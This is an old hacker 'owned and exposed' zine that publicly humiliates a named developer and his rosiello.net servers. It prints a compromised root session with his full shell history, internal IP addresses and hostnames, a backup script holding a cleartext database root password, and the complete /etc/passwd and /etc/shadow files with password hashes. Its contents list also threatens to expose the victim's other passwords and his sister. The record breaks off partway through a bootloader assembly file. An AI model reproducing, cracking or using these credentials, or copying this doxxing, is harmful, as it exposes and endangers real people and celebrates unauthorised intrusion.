ROSIELLO.net
-------------------------------------------------
J O H N N Y M A S T (U R B A T E) aka rave
-------------------------------------------------
G E T S
OWNED
A N D
EXPOSED

21:28 <@rave> im writing README.ssl
21:30 <@rave> why ?. Because we take security as a serieuse thing

###################################################################
[1] rave info
[2] www.rosiello.net owned & exposed
[3] laptop.localdomain (192.168.0.6) owned & exposed
[4] localhost.localdomain (192.168.0.10) owned & exposed
[5] www.xdevteam.net owned & exposed
[6] irc.rosiello.net unrealircd.conf exposed
[7] eftpd gets alittle modded
[8] rave's master plans to own dikline exposed
[9] rave's 1337 tips to Internet hacking exposed
[10] rave's 1337 passwords exposed
[11] rave's sister gets owned & exposed
[12] the rm -rf /*
[13] Conclusion
###################################################################

[1] rave info

saved for n0tm3

[2] www.rosiello.net owned & exposed

sh-3.00$ ssh rave@rosiello.net
Password:
Last login: Thu Aug 18 17:37:24 2005 from 192.168.0.10
rave@debian:~$ uname -a; id
Linux debian.rosiello.net 2.4.27-2-386 #1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux
uid=1000(rave) gid=1000(rave) groups=1000(rave),1001(cvsgroup),1007(cvsuser)
rave@debian:~$ ls -la
total 269092
drwxr-xr-x 31 rave rave 4096 Aug 17 22:40 .
drwxrwsr-x 13 root staff 4096 Aug 10 19:21 ..
drwx------ 2 rave rave 4096 Aug 15 21:10 .AbiSuite lrwxrwxrwx 1 rave rave 45 Jul 1 16:47 .DCOPserver_debian.rosiello.net_:0 -> /home/rave/.DCOPserver_debian.rosiello.net__0 -rw-r--r-- 1 rave rave 66 Jul 1 16:47 .DCOPserver_debian.rosiello.net__0 -rw------- 1 rave rave 1174 Jul 1 16:47 .ICEauthority -rw------- 1 rave rave 64 Jul 1 16:47 .Xauthority -rw------- 1 rave rave 6294 Aug 14 12:51 .bash_history -rw-r--r-- 1 rave rave 704 Apr 23 22:18 .bash_profile -rw-r--r-- 1 rave rave 1290 Apr 23 22:18 .bashrc -rw------- 1 rave rave 22 Apr 25 00:46 .dmrc drwxr-xr-x 3 rave rave 4096 Apr 25 00:41 .evolution -rw-r--r-- 1 rave rave 563794 Aug 17 22:40 .fonts.cache-1 drwx------ 4 rave rave 4096 Aug 17 23:43 .gaim drwx------ 4 rave rave 4096 Jul 1 14:09 .gconf drwx------ 2 rave rave 4096 Aug 15 21:10 .gconfd -rw-r----- 1 rave rave 0 Jul 1 14:06 .gksu.lock drwx------ 3 rave rave 4096 Apr 23 23:50 .gnome drwx------ 9 rave rave 4096 Jul 1 14:15 .gnome2 drwx------ 2 rave rave 4096 Apr 23 23:50 .gnome2_private drwxr-xr-x 3 rave rave 4096 May 16 22:34 .gnupg drwxr-xr-x 2 rave rave 4096 Apr 23 23:50 .gstreamer-0.8 -rw-r--r-- 1 rave rave 86 Apr 23 23:50 .gtkrc-1.2-gnome2 drwx------ 4 rave rave 4096 May 16 21:16 .kde drwxr-xr-x 3 rave rave 4096 Apr 25 00:48 .mcop -rw------- 1 rave rave 31 Jul 1 13:01 .mcoprc drwx------ 3 rave rave 4096 Apr 23 23:50 .metacity drwx------ 3 rave rave 4096 Apr 23 23:52 .mozilla -rw------- 1 rave rave 36 Aug 2 22:13 .nano_history drwxr-xr-x 3 rave rave 4096 Apr 23 23:50 .nautilus drwxr-xr-x 2 rave rave 4096 Jul 12 20:59 .qt -rw------- 1 rave rave 0 Apr 23 23:50 .recently-used drwx------ 2 rave rave 4096 May 5 18:54 .ssh drwx------ 4 rave rave 4096 Aug 2 23:30 .thumbnails -rw------- 1 rave rave 609 Aug 2 22:18 .viminfo drwx------ 3 rave rave 4096 Jul 1 13:05 .xchat2 drwxr-xr-x 4 rave rave 4096 Apr 23 23:52 .xmms -rw-r--r-- 1 rave rave 200124 Jul 25 20:39 .xsession-errors -rw-r--r-- 1 rave rave 7920 Jun 16 22:18 1077606958.gif drwxr-xr-x 3 rave rave 4096 Aug 2 
23:18 Desktop drwx------ 7 rave rave 4096 May 11 21:23 Mail drwxr-xr-x 2 rave rave 4096 May 17 01:37 bin drwxr-xr-x 29 rave rave 4096 Jul 21 21:43 bk drwxr-xr-x 3 root root 4096 Aug 17 22:29 cmds drwxr-xr-x 7 root root 4096 Jun 30 11:16 cvsroot -rw-r--r-- 1 rave rave 174 Aug 14 12:51 dr.c drwxrwxrwx 2 root root 4096 Jul 3 01:36 edge drwxr-xr-x 4 root root 4096 Aug 17 22:34 extra drwxr-xr-x 10 rave rave 4096 Aug 14 12:36 extreme -rw-r--r-- 1 rave rave 74 May 16 22:22 gpg-agent-info -rw------- 1 rave rave 13449 May 17 19:10 mbox -rw-r--r-- 1 rave rave 96 May 16 22:33 text.gpg -rw-r--r-- 1 rave rave 274280544 Aug 6 15:14 ubuntu-5.04-install-i386.iso -rwxr-xr-x 1 rave rave 32 May 17 01:34 vuln.sh rave@debian:~$ ls 1077606958.gif Desktop Mail bin bk cmds cvsroot dr.c edge extra extreme gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh rave@debian:~$ cat vuln.sh #!/bin/sh /bin/echo hello world rave@debian:~$ cat dr.c #define MODULE #include int init_module(void) { printk("<1>Hello, world\n"); return 0; } void cleanup_module(void) { printk("<1>Goodbye cruel world\n"); } rave@debian:~$ ls * 1077606958.gif dr.c gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh Desktop: Install_DinerDash.EXE Stef Bos - Papa (2).mp3 Trash install_flash_player_7_linux.tar.gz nieuw Mail: drafts inbox outbox sent-mail trash bin: echo bk: Desktop Templates VIDEO_TS boot extreme cmds: Attic cvsroot: CVSROOT anIRCD extreme jatx rpf edge: log extra: ftppasswd ftpwho extreme: AUTHORS CVS INSTALL Makefile.cvs README TODO aclocal.m4 conf config.h.in config.status configure.in install-sh ltmain.sh mkinstalldirs src COPYING ChangeLog Makefile Makefile.in README_TEAM TODO~ aclocal.m4.save config.guess config.h.in~ config.sub depcomp la.c man modules stamp-h COPYRIGHTS Doxyfile Makefile.am NEWS TEAM Working autom4te.cache config.h config.log configure extreme2-0.1 la.c.save missing scripts stamp-h.in rave@debian:~$ cat .ssh/known_hosts
rave@debian:~$ cat .bash_history mail mail -f hostname mail mail hostname exit mail finger rave exit mail mail exit mail /sbin/ifconfig exit mail mail -r mail -f exit mail mail mail ssh niki@www.xsol.biz nslookup ms.rosiello.net nslookup mx.rosiello.net nslookup mx.rosiello.net /sbin/ifconfig nslookup mx.rosiello.net nslookup mx.rosiello.net --help nslookup 212.127.146.168 nslookup nslookup mx.rosiello.net
@212.127.146.168 nslookup mx.rosiello.net @62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 ifconfig /sbin/ifconfig ls cd /etc ls export set su mail mail nslookup www.rosiello.net exit mail mail mail mail finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave hostname /sbin/ifconfig exit ls gpg --help gpg --verify text.pgp ls gpg --verify text.gpg ls gpg --decrypt text.gpg ls exit mail exit exit mail mail mail finger rave pwd pico vuln.sh chmod a+x vuln.sh ./vuln.sh export PATH=./:$PATH export IFS="/: export IFS="/" ./vuln.sh ./vuln.sh ls ./vuln.sh export IFS=/ ./vuln.sh ls strace vuln.sh pico bin chmod a+x bin ./vuln.sh export IFS=\ export IFS=\\ ./vuln.sh export IFS=/ ./vulnsh ./vuln.sh mkdir bin cp bin echo ls ./vuln.sh mkdir bin rm bin mkdir bin cd bin cp ../echo ./ cd .. 
./vuln.sh cat vuln.sh echo $PATH echo $PATH sh -c vuln.sh cat vuln.sh export IFS=\ export IFS=// echo $PATH export IFS=/ echo $PATH echo $PATH nslookup mx.rosiello.net exit mail mail exit mail finger rave exit mail exit mail mail mail export dmomain hostname /sbin/ifconfig telnet mx.rosiello.net 25 ssh rave@war.swehack.se mail exit ls exit CVSROOT=:ext:cvsuser@192.168.0.2:/cvsroot export CVS_RSH pwd ls cvs export extreme CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs export extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs export extreme cvs export extreme cvs export extreme cvs help cvs export extreme cvs help export cvs export help cvs checkout extreme ls cd extreme ./configure make cd src ls ./eftpd -P la ls ./rftpd ls exit cd extreme cvs update extreme cvs export extreme cvs update extreme export export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update extreme export CVS_RSH export CVS_RSH=ssh export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update extreme cvs update extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" exit cd extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update ls ./configure make ls id /sbin/ifconfig exit su /sbin/ifconfig su su dmesg | grep zip dmesg lspci lspci | grep zip lspci | grep io lspci | grep iom dmesg | grep iom dmesg cd /media ls df ls df u su exit cd /etc/hackuppc cd /etc/backuppc ls cat htpasswd htpasswd htpasswd ./htpasswd admin cat htpasswd su exit ls ls -l cd cvsroot ls cd .. ls pwd exit passwd passwd ssh kevin@rootme.dyndns.org ftp ftp ifconfig exit cd /var/www/egde cd /var/www/edge ls cd *2005* ls ls cd include ls cat link its tooooo damn hot outside :( hypnosses haha hypnosses and all those bears that live outthere ls cat edge.header.php cd .. cat config.php ls cat user.php cd site pico include/config.php ls -l su exit cd /var/www/edge/*2005* ls cd site ls pico index.php su cd bk ls ls cd boot ls cd .. 
exit cd bk ls scp .xchat2 rave@192.168.0.6:~ scp -r .xchat2 rave@192.168.0.6:~ ls -an scp -r .evolution rave@192.168.0.6:~ ls -an | more scp -r .gnupg rave@192.168.0.6:~ cd .gnupg ls ls -l ls ls ls -l mv gpg-agent-info gpg-agent-info.bk exit cd bk scp -r extreme rave@192.168.0.6:~ exit cd bk ls cd Desktop ls cd .. ls -an su cd bk ls cd Desktop ls scp -r aap rave@192.168.0.6:~/Desktop/ cat > la su exit cd bk ls cd Desktop ls cd Downloads ls ls | *.mp3 ls *.mp3 ls *bad ls *Bad* ls ssh kevin@rootwar.rosiello.net ssh ravecool@cf.sf.net <--- Oh yes! he is sooo coool exit cd bl cd bk ls -lan | more ls -lan | more scp -r .gnupg rave@192.168.0.06:~ scp -r extreme rave@192.168.0.06:~ scp -r .xchat2 rave@192.168.0.06:~ su w ps aux ps aux su pico transfer.c cd extreme2 cd extreme cd src pico transfer.c make man fnctl man fcntl pico transfer.c make pico transfer.c make pico transfer.c pico transfer.c make pico transfer.c pico transfer.c make make clean make scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cat CVS/Root ls pico CVS/Root cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cd CVS ls pico Respository pico Repository pico Entries cd .. cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c pico CVS/Entries cvs commit pico CVS/Entries cd CVS mv Entries Entries.bk cd .. mv Entries Entries.bk cvs commit cd CVS touch Entries cd .. cvs commit cvs commit ls ls cd .. cvs update pico CVS/Root cvs update ls cd conf ls pico CVS/Root cvs update ls cd .. 
ls cd src ls cd extra sl; ls pico CVS/Root cvs update l ls cd ftppasswd ls pico CVS/Root ls cvs update ls cd ../ftpwho pico CVS/Root cvs update cd .. cd .. ls ls rm Makefile.FreeBSD ls rm Makefile.Linux ls exit ls ftp exit cd extreme/src ./eftpd -P la ls pwd ./eftpd -P la uname -a exit su- su - ls ls cat echo rm echp rm echo cd extreme/src make cd /tmp pico dr.c gcc -o dr.c gcc -o dr dr.c pico dr.c gcc -o dr dr.c -I/lib/modules/`uname -r`/include/ ls/lib/modules/`uname -r`/include/ ls /lib/modules/`uname -r`/include/ ls /lib/modules/`uname -r`/ ls /lib/modules/`uname -r`/kernel ls /usr/src/`uname -r`/ ls /usr/src/ ls /usr/src/ uname -a ls /usr/src ls /usr/src gcc -c bk.c ls gcc -c dr.c ls /usr/src ls ls /lib/ ls /lib/modules/`uname -r` ls /lib/modules/`uname -r`/kernel ls /lib/modules/`uname -r`/kernel/arch ls /lib/modules/`uname -r`/kernel/arch/*/ ls /lib/modules/`uname -r`/kernel/arch/*/* ls cd /usr/src ls ls -an pwd cd .. ls cd /usr/src/kernel-headers-2.4.27-2 ls /usr/src make cd /tmp gcc -c dr.c cp dr.c ~ rave@debian:~$ su - Password: debian:~# id uid=0(root) gid=0(root) groups=0(root) debian:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1492 464 ? S Jul01 0:02 init [2] root 2 0.0 0.0 0 0 ? S Jul01 0:05 [keventd] root 3 0.0 0.0 0 0 ? SN Jul01 0:01 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? S Jul01 1:11 [kswapd] root 5 0.0 0.0 0 0 ? S Jul01 0:00 [bdflush] root 6 0.0 0.0 0 0 ? S Jul01 0:00 [kupdated] root 105 0.0 0.0 0 0 ? S Jul01 1:21 [kjournald] root 389 0.0 0.1 1476 384 ? Sla.php pico la.php df exit cd /etc ls | grep pure cd pure-ftpd ls cd conf ls cd .. cd .. ls | grep ftp cd pure-ftpd ls cd conf ls pico MinUID ls updatedb ls locate ftpd.conf locate ftpd.conf | grep pure locate .conf | grep pure ls ls pico AltLog ls pico MinUID ls cd .. 
ls cd auth ls pwd ls pure-ftpd --help pure-ftpd --help | grep active pure-ftpd --help | more pure-ftpd --tls killall pure-ftpd ps aux ps aux | grep ftp killall inetd pure-ftpd --tls ls ls pwd ls cd .. ls cd dn cd db ls cd .. ls ls -l pico http://koti.mbnet.fi/lordscav/demogal/ pico pureftpd-dir-aliases ifconfig exit cd /var/www/edge/*2006 cd /var/www/edge/*2005 ls ls | grep th pico theme.conf.php exit cd /var/www/manual ls cd .. cd dc ls scp -r manual rave@192.168.0.2:~/Desktop/ scp -r manual rave@192.168.0.6:~/Desktop/ ls exit df df -a ls /mnt/media ls ls /media/zip ls -l /media/zip ls -l /media/zip cd /var/www/edge/*2005 ls ls *the* ls *theme* pico theme.conf.php cd imgsystem ls cp logo.gif logo.kids.gif wget http://www.rosiello.net/mainsite/uploads/orig00000082.jpg mv http://www.rosiello.net/mainsite/uploads/orig00000082.jpg logo.gif mv orig00000082.jpg logo.gif df /media/zip cd /media/zip ls stat Backup.2005-08-08 cd Backup.2005-08-08 ls size * stat * cd /var/www ls ls cd my.org cd module ls cd .. ls cd downloads ls cd .. ls cd zoper ls cd /tmp wget http://ovh.dl.sourceforge.net/sourceforge/wikipedia/mediawiki-1.4.7.tar.gz gunzip mediawiki-1.4.7.tar.gz tar fvx mediawiki-1.4.7.tar cd mediawiki-1.4.7 ls cd .. 
cp -r mediawiki-1.4.7 /var/www/wiki cd /var/www/wiki chmod a+w config locate php.ini pico /etc/php4/apache2/php.ini /etc/init.d/apache restart /etc/init.d/apache2 restart pico /etc/php4/apache2/php.ini pico /etc/php4/apache2/php.ini /etc/init.d/apache2 restart pico /etc/php4/apache2/php.ini /etc/init.d/apache2 restart cat /etc/cron.daily/run mv config/LocalSettings.php ./ l ls pico * angelo has quit () nanonyme rave: since the shell no longer uses ipv6, i changed back to your server :) pico LocalSettings.php ls -l | grep images chmod 777 images pico LocalSettings.php ls cd ../ cd extreme ls rm * ls rm -r * ls exit cd /Unreal* ls pico unrealircd.conf whois irc.rosiello.net nslookup irc.rosiello.net pico unrealircd.conf exit cd /Unreal* ls pico unrealircd.conf pico unrealircd.conf exit cd /Unreal* ls useradd top passwd top pico /etc/passwd exit pico /etc/passwd adduser cold passwd cold ls ~cold ls /home ls -l /home pico /etc/group id cold w w apt-get propertys openssl w exit ssh rave@192.168.0.6 ssh root@216.194.56.245 exit cd /cvsroot/jatx ls ls -l cat passwd ls -l ../extreme chown rave.cvsuser * cd .. 
chown rave.cvsuser * chown rave.cvsuser headers/* chown rave.cvsuser jatx/headers/* ls apt-get install bind9 apt-get install webmin-bind9 apt-get install webmin-bind ps aux ps aux | grep mini cd /etc/init.d ls ./webmin ./webmin start netstat -anp | grep mini netstat -anp | grep serv netstat -anp | grep web netstat -anp | grep 10 netstat -anp | grep 100 cd /etc/webmin ls pico miniserv.conf /etc/init.d/webmin start /etc/init.d/webmin restart pico miniserv.conf /etc/init.d/webmin restart pico miniserv.conf /etc/init.d/webmin stop /etc/init.d/webmin start killlall miniserv ps aux | grep mini kill -9 1745 ps aux | grep mini /etc/init.d/webmin start pico miniserv.conf /etc/init.d/webmin restart ls -l /usr/share/webmin/bind/index.cgi ls -l /usr/share/webmin/bind/index.cgi chmod 777 /usr/share/webmin/bind/index.cgi pico /usr/share/webmin/bind/index.cgi pico /usr/share/webmin/bind/index.cgi ls cd .. ls pwd apt-get install bind9 apt-get install webmin-bind9 apt-get remove webmin-bind apt-get install webmin-bind pwd apt-get search apt-get list apt-get --help apt-get -u apt-get -u cd /etc/named ls cd /etc/bind ls pico named.conf ls pico db.local pico named.conf pico "/etc/bin/db.alpha" ls pico db.0 pico "/etc/bin/db.alpha" ls clear ls pico zones.rfc1918 ls pico db.empty pico named.conf /etc/init.d/named restart /etc/init.d/bind restart /etc/init.d/bind9 restart ping alpha.rosiello.net pico named.conf ls pico "/etc/bin/db.alpha" pwd pico /etc/bind/db.alpha pico named.conf pico /etc/bind/db.alpha /etc/init.d/bind9 restart ping alpha.rosiello.net nslookup alpha.rosiello.net @localhost nslookup alpha.rosiello.net @127.0.0.1 nslookup alpha.rosiello.net 127.0.0.1 dig alpha.rosiello.net 127.0.0.1 dig alpha.rosiello.net @127.0.0.1 dmesg tail /var/log/syslog pico /etc/bind/db.alpha /etc/init.d/bind9 restart clear dig alpha.rosiello.net @127.0.0.1 tail /var/log/syslog dig alpha dig alpha @localhost pico /etc/bind/db.alpha /etc/init.d/bind9 restart dig alpha @localhost ping alpha ping 
alpha.rosiello.net ping alpha.rosiello.net pico /etc/bind/db.alpha /etc/init.d/bind9 restart ping alpha.rosiello.net dig alpha @localhost ping alpha pico /etc/resolv pico /etc/resolv.conf ping alpha clear nslookup alpha dig alpha debian:/etc/bind# dig alpha ; <<>> DiG 9.2.4 <<>> alpha ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10755 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;alpha. IN A ;; ANSWER SECTION: alpha. 604800 IN A 192.168.0.7 ;; AUTHORITY SECTION: alpha. 604800 IN NS alpha.rosiello.net. ;; Query time: 2 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Sat Aug 13 14:16:56 2005 ;; MSG SIZE rcvd: 71 debian:/etc/bind# dig rosiello.net ping alpha ls pico /etc/apache/apache.conf pico /etc/apache/apache2.conf pico /etc/apache2/apache2.conf cd /etc/apache2/ ls pico httpd.conf cd sites-available ls pico alpha cp befault aplha cp default aplha pico alpha cp default alpha rm aplha pico alpha ssh 192.168.0.7 ssh 192.168.0.8 ssh 192.168.0.7 ssh 192.168.0.6 ssh alpha ssh alpha /etc/init.d/apache2 restart ssh alpha ssh 192.168.0.9 ssh 192.168.0.8 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.9 ls cd /etc/namned cd /etc/bind ls pico db.alpha /etc/init.d/bind restart /etc/init.d/bind9 restart ping alpha ssh alpha ping alpha cd /var/log cd apache cd httpd ls cd apache2 ls tail error_log cd /var/www/apache2 cd /etc/apache2 ls cd site-a* ls cd sites-a* ssh alpha /etc/init.d/apache2 restart cd /var/log/apache2 tail error_log ls tail error.log tail error.log tail error.log | grep alp ls tail access.log | grep alp cat access.log | grep alpa cat * | grep alpha.rosiello.net ls cd /etc/init.d ls cd /etc/apache2 ls cd sites-en cd sites-en* ls pico 000-default cd ../sites-a* ls pico alpha /etc/init.d/apache2 /etc/init.d/apache2 restart tail /var/log/apache2/error_log tail 
/var/log/apache2/error.log cd .. ls pico apache2.conf pico httpd.conf ls ps aux ifconfig dpkg-reconfigure xserver-xfree ssh alpha exit apt-get install webmin-apache e16 enlichtanet enlightamet enlightament enlightenment enlightenment cd /home/infobot ls cd * ls cd conf ls pico infobot.config ps aux ps aux | grep infobot kill 30084 nohub ./infobot & nohup ./infobot & ls ls infobot ls infobot* cd .. nohup ./infobot & pico conf/infobot.conf pico config/infobot.conf cd conf pico infobot.config nohup ./infobot & cd .. killall infobot nohup ./infobot & pico config/infobot.config cd conf pico infobot.config killall infobot cd .. nohup ./infobot & exit ping 192.168.0.10 cd /etc/named cd /etc/bind ls pico db.alpha /etc/init.d/bind restart /etc/init.d/bind9 restart lynx alpha.rosiello.net exit cd ~infobot/*/config cd ~infobot/*/conf pico infobot.config killall infobot nohup ./infobot & cd .. nohup ./infobot & exit cd /var/www pico compile.txt exit cd /cvsroot ls cd extreme ls cd src ls ls cmds ls cmds/Attic cp -r cmds ~rave rm -r cmds cp -r extra ~rave rm -r extra exit debian:~# cat .ssh/known_hosts
debian:~# cat run.sh #!/bin/sh SRC="/home/rave/extreme/" TARGET="/media/zip/" TARGET2="/root/backup/" TAR="/bin/tar" DATUM=`date --iso-8601=date` DB="template" DBUSER="root" DBPASS="st4lk3rs" MYSQL="/usr/bin/mysqldump" FILE="Backup.$DATUM" echo $TARGET$FILE echo $TARGET2$FILE cd /tmp $TAR -zvcf $FILE.tar.gz $SRC $MYSQL $DB --user=$DBUSER --password=$BDPASSWD > $FILE.sql mkdir $TARGET$FILE mkdir $TARGET2$FILE cp $FILE.tar.gz $TARGET$FILE 2> /dev/null cp $FILE.tar.gz $TARGET2$FILE 2> /dev/null cp $FILE.sql $TARGET$FILE 2> /dev/null cp $FILE.sql $TARGET2$FILE 2> /dev/null echo "$FILE.tar.gz Created in $TARGET$FILE and $TARGET2$FILE" >>/root/backup.log echo "$FILE.sql Created in $TARGET$FILE and $TARGET2$FILE" >>/root/backup.log debian:~# ls * 0x1a 0x1aa backup.log dbootstrap_settings dead.letter install-report.template run.sh CVS: Entries Entries.Log Entries.Static Repository Root CVSROOT: CVS checkoutlist commitinfo config cvswrappers loginfo modules notify rcsinfo taginfo verifymsg backup: Backup.2005-07-27 Backup.2005-07-29 Backup.2005-07-31 Backup.2005-08-02 Backup.2005-08-04 Backup.2005-08-06
Backup.2005-08-08 Backup.2005-08-10 Backup.2005-08-12 Backup.2005-08-14 Backup.2005-08-16 Backup.2005-08-18 Backup.2005-07-28 Backup.2005-07-30 Backup.2005-08-01 Backup.2005-08-03 Backup.2005-08-05 Backup.2005-08-07 Backup.2005-08-09 Backup.2005-08-11 Backup.2005-08-13 Backup.2005-08-15 Backup.2005-08-17 bugzilla: bin cgi-bin conf htdocs icons include info lib libexec logs man mysql-test proxy share sql-bench tt2 var graphs: tool: run.sh debian:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false rave:x:1000:1000:Johnny Mast,,,:/home/rave:/bin/bash postgres:x:100:103:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash messagebus:x:101:104::/var/run/dbus:/bin/false hal:x:106:106:Hardware abstraction layer,,,:/var/run/hal:/bin/false identd:x:103:65534::/var/run/identd:/bin/false sshd:x:104:65534::/var/run/sshd:/bin/false gdm:x:105:109:Gnome Display Manager:/var/lib/gdm:/bin/false saned:x:111:111::/home/saned:/bin/false top:!!:0:0::/home/top: infobot:!!:1002:100::/home/infobot: cvsuser:$1$PF/B7FYn$1gSetRbjjybehTAkgC34P/:1004:100::/home/cvsuser: cvsd:x:107:112:cvs pserver daemon:/cvsroot:/bin/false webcam:!!:1005:113::/var/www/images1:/bin/bash mailman:!!:1006:1006:mailman,,,:/home/mailman:/bin/bash smmta:x:108:114:Mail Transfer 
Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false backuppc:x:110:116:BackupPC,,,:/var/lib/backuppc:/bin/sh mysql:x:112:117:MySQL Server,,,:/var/lib/mysql:/bin/false zope:x:113:118::/var/lib/zope2.7/var:/bin/false commiters:!!:1003:1003:la,la,la,la,la:/home/commiters:/bin/bash saxa:x:1007:100::/home/saxa: pisg:x:1008:100::/home/pisg: angelo:x:1009:100::/home/angelo: asterisk:x:119:119:Asterisk PBX daemon,,,:/var/lib/asterisk:/bin/false cold:x:1010:1010:Chad .c Delecia,,,:/home/cold:/bin/bash bind:x:114:120::/var/cache/bind:/bin/false debian:~# cat /etc/shadow root:$1$/zsQh1gp$SqhvkZ/hAOJ8bqvctoIO60:12896:0:99999:7::: daemon:*:12896:0:99999:7::: bin:*:12896:0:99999:7::: sys:*:12896:0:99999:7::: sync:*:12896:0:99999:7::: games:*:12896:0:99999:7::: man:*:12896:0:99999:7::: lp:*:12896:0:99999:7::: mail:*:12896:0:99999:7::: news:*:12896:0:99999:7::: uucp:*:12896:0:99999:7::: proxy:*:12896:0:99999:7::: www-data:*:12896:0:99999:7::: backup:*:12896:0:99999:7::: list:*:12896:0:99999:7::: irc:*:12896:0:99999:7::: gnats:*:12896:0:99999:7::: nobody:*:12896:0:99999:7::: Debian-exim:!:12896:0:99999:7::: rave:$1$jMXmjKYi$Rkrw8NjvOQ5wK.i1Gz/xc.:12973:0:99999:7::: postgres:!:12896:0:99999:7::: messagebus:!:12896:0:99999:7::: hal:!:12896:0:99999:7::: identd:!:12896:0:99999:7::: sshd:!:12896:0:99999:7::: gdm:!:12896:0:99999:7::: saned:!:12896:0:99999:7::: top:$1$00SuKszA$LS6Wq02YtGVIUAmzuKnuL1:12897:0:99999:7::: infobot:!:12897:0:99999:7::: cvsuser:$1$a8aWeeeu$k4.IWNK8JmkBbrON/QJZa/:12908:0:99999:7::: cvsd:!:12908:0:99999:7::: webcam:$1$pOnnXk9F$WKSkPHlyxMkZgIOJchJ4S0:12932:0:99999:7::: mailman:$1$esgmUHJp$PsugdoYzV0VnrjoYn1FRA1:12919:0:99999:7::: smmta:!:12920:0:99999:7::: smmsp:!:12920:0:99999:7::: backuppc:$1$V7BzjcWZ$7qN1YR1FjtL2s9rGYowNj/:12965:0:99999:7::: mysql:!:12966:0:99999:7::: zope:!:12966:0:99999:7::: commiters:$1$1VvgOPZ7$oUapZsn7.hB3Bs7VOIOr..:12968:0:99999:7::: 
saxa:$1$1LjOGXvd$7PY7f4534zyaOcvjhMjHK1:12968:0:99999:7:::
pisg:!:12968:0:99999:7:::
angelo:$1$8CR4j8/n$gHbiIeK0i9EB.phRoisMW/:12981:0:99999:7:::
asterisk:!:12982:0:99999:7:::
cold:$1$iD0b/cDI$9TAv1tXhe4DioH3CvH3BT0:13005:0:99999:7:::
bind:!:13008:0:99999:7:::
debian:~# cd /var/www/
debian:/var/www# ls
3.asm analog boot.txt dc edge-01-06-2005.tar.gz icons index.html main.c mod_warez.c my.asm pgp priv transfer.c.txt webcam zoper
GT4 apache2-default bugzilla downloads extreme images jatx main.txt module my.org phpBB-2.0.16.zip site upload wiki
Screenshot.png boot.asm compile.txt edge extreme.tar.gz imgsystem la.tar.gz manual module.tar.gz pacct pics smnt.c uploads xcs
debian:/var/www# echo "oooh.. what do we got here..."
oooh.. what do we got here...
debian:/var/www# cat 3.asm
; 3.ASM
; Load a program off the disk and jump to it

; Tell the compiler that this is offset 0.
; It isn't offset 0, but it will be after the jump.
[ORG 0]

        jmp 07C0h:start ; Goto segment 07C0

start:
        ; Update the segment registers
        mov ax, cs
        mov ds, ax
        mov es, ax

reset: ; Reset the floppy drive
        mov ax, 0 ;
        mov dl, 2 ; Drive=0 (=A)
        int 13h ;
; jc reset ; ERROR => reset again

read:
        mov ax, 1000h ; ES:BX = 1000:0000
        mov es, ax ;
        mov bx, 0 ;

        mov ah, 2 ; Load disk data to ES:BX
        mov al, 5 ; Load 5 sectors
        mov ch, 0 ; Cylinder=0
        mov cl, 2 ; Sector=2
        mov dh, 0 ; Head=0
        mov dl, 0 ; Drive=0
        int 13h ; Read!
; jc read ; ERROR => Try again

        call a20
        call pmod
        jmp 1000h:0000 ; Jump to the program
        ret

a20: ; set A20 line
        cli ; no more interuptions! :)
        xor cx, cx
clear_buf:
        in al, 64h ; get input from keyboard status port
        test al, 02h ; test the buffer full flag
